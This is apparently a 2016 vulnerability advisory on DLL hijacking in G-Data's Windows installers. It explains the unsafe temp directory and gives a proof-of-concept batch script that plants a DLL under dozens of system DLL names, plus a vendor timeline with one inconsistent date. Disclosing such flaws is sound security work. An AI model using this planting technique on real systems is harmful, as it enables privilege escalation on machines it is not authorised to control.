G-Data DLL Hijacking

2016.04.20
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Hi @ll, the executable installers of G-Data's "security" products for Windows, available from <https://www.gdata.de/downloads>, allow escalation of privilege! The downloadable executables are self-extractors containing the real executable installer as resource: they create the subdirectory %TEMP%\{guidguid-guid-guid-guid-guidguidguid} using another resource containing the hardcoded value of this GUID, extract the real executable installer into it and finally start it. The permissions of this subdirectory allow "full access" for the unprivileged user who started the self-extractor, enabling him to create arbitrary files in this subdirectory. The real installer loads multiple Windows system DLLs from this subdirectory instead of Windows' "system directory" %SystemRoot%\System32\ and executes them with elevated rights. On Windows 7: dbghelp.dll, dnsapi.dll, oleacc.dll, netapi32.dll, netutils.dll, srvcli.dll, wkscli.dll, version.dll, uxtheme.dll/dwmapi.dll, cryptsp.dll, ncrypt.dll, bcrypt.dll, profapi.dll, msimg32.dll, riched32.dll, iphlpapi.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, sensapi.dll, rasadhlp.dll, ntmarta.dll, ntshrui.dll, cscapi.dll, slc.dll, windowscodecs.dll, apphelp.dll, mpr.dll, userenv.dll, schannel.dll, credssp.dll, secur32.dll, gpapi.dll, samcli.dll See <https://cwe.mitre.org/data/definitions/379.html> for the well- known and well-documented unsafe TEMP directory vulnerability, and <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html> plus <https://capec.mitre.org/data/definitions/471.html> for the well- known and well-documented unsafe DLL search path vulnerability. Proof of concept/demonstration: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. visit <http://home.arcor.de/skanthak/sentinel.html>, download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> and save it in your "Downloads" directory; 2. download "G DATA ANTIVIRUS" from <https://www.gdata.de/downloads> and save it in your "Downloads" directory (the resulting file is named G_DATA_AntiVirus.exe); 3. create the following file as SENTINEL.CMD in your "Downloads" directory: --- SENTINEL.CMD--- G_DATA_AntiVirus.exe :LOOP If Not Exist "%TEMP%\{1C2DF59B-0172-4ECB-9A25-7597A4A26A96}\INT_R_BASE_AV.exe" Goto :LOOP For %%! In (dbghelp dnsapi oleacc netapi32 netutils srvcli wkscli version uxtheme dwmapi cryptsp ncrypt bcrypt profapi msimg32 riched32 iphlpapi winnsi rasapi32 rasman rtutils sensapi rasadhlp ntmarta ntshrui cscapi slc windowscodecs apphelp mpr userenv schannel credssp secur32 gpapi samcli) Do MkLink /H "%TEMP%\{1C2DF59B-0172-4ECB-9A25-7597A4A26A96}\%%!.dll" "%~dpn0.dll" --- EOF --- 4. run the batch script per double-click: it starts the downloaded self-extractor and plants the DLLs for hijacking; 5. notice the message boxes displayed from the DLLs. PWNED! stay tuned Stefan Kanthak PS: I really LOVE (security) software with such trivial beginner's errors. It's a tell-tale sign to better stay away from it! Timeline: ~~~~~~~~~ 2016-06-03 initial report sent to vendor: they provided their real installers for download, allowing DLL hijacking in the users "Downloads" directory 2016-03-06 vendor acknowledges receipt: "At the moment we are exploring the best way to fix it." 2016-04-13 reply from vendor: "We replaced all installers and tools in the download area with secure versions." 2016-04-17 No, these "installers" are NOT secure, they use UNSAFE temp directories and just shift the attack vector a tiny little bit. 2016-04-18 reply from vendor: "We assume that this is pure speculation." 2016-04-18 OUCH! <https://bugzilla.mozilla.org/show_bug.cgi?id=811557>, <https://code.google.com/p/google-security-research/issues/detail?id=440> 2016-04-18 reply from vendor: "the attacker needs access to the system for that." 2016-04-18 report published


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top